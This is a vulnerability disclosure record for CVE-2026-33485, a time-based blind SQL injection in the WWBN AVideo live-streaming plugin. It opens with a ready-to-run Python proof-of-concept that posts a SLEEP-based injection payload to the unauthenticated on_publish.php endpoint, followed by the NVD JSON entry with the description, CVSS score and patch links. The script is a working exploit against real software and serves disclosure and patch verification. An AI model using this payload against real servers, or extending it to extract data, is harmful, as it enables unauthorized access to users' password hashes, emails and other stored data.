CVE-2026-33485

import requests import time # Target URL # Replace with the actual target URL target_url = "http://example.com/plugin/Live/on_publish.php" # Payload for time-based blind SQL injection # This payload attempts to cause a delay of 5 seconds if the condition is true payload = { "name": "' OR (SELECT SLEEP(5))-- -" } try: print("[*] Sending payload to target...") start_time = time.time() response = requests.post(target_url, data=payload, timeout=10) end_time = time.time() elapsed_time = end_time - start_time if elapsed_time >= 5: print(f"[+] Vulnerability confirmed! Response took {elapsed_time:.2f} seconds.") else: print(f"[-] Vulnerability not detected or patched. Response took {elapsed_time:.2f} seconds.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-33485", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:34.887", "lastModified": "2026-03-24T18:35:45.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the RTMP `on_publish` callback at `plugin/Live/on_publish.php` is accessible without authentication. The `$_POST['name']` parameter (stream key) is interpolated directly into SQL queries in two locations — `LiveTransmitionHistory::getLatest()` and `LiveTransmition::keyExists()` — without parameterized binding or escaping. An unauthenticated attacker can exploit time-based blind SQL injection to extract all database contents including user password hashes, email addresses, and other sensitive data. Commit af59eade82de645b20183cc3d74467a7eac76549 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el callback RTMP 'on_publish' en 'plugin/Live/on_publish.php' es accesible sin autenticación. El parámetro '$_POST['name']' (clave de transmisión) se interpola directamente en consultas SQL en dos ubicaciones — 'LiveTransmitionHistory::getLatest()' y 'LiveTransmition::keyExists()' — sin enlace parametrizado ni escape. Un atacante no autenticado puede explotar una inyección SQL ciega basada en tiempo para extraer todo el contenido de la base de datos, incluyendo hashes de contraseñas de usuarios, direcciones de correo electrónico y otros datos sensibles. El commit af59eade82de645b20183cc3d74467a7eac76549 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/af59eade82de645b20183cc3d74467a7eac76549", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8p58-35c3-ccxx", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}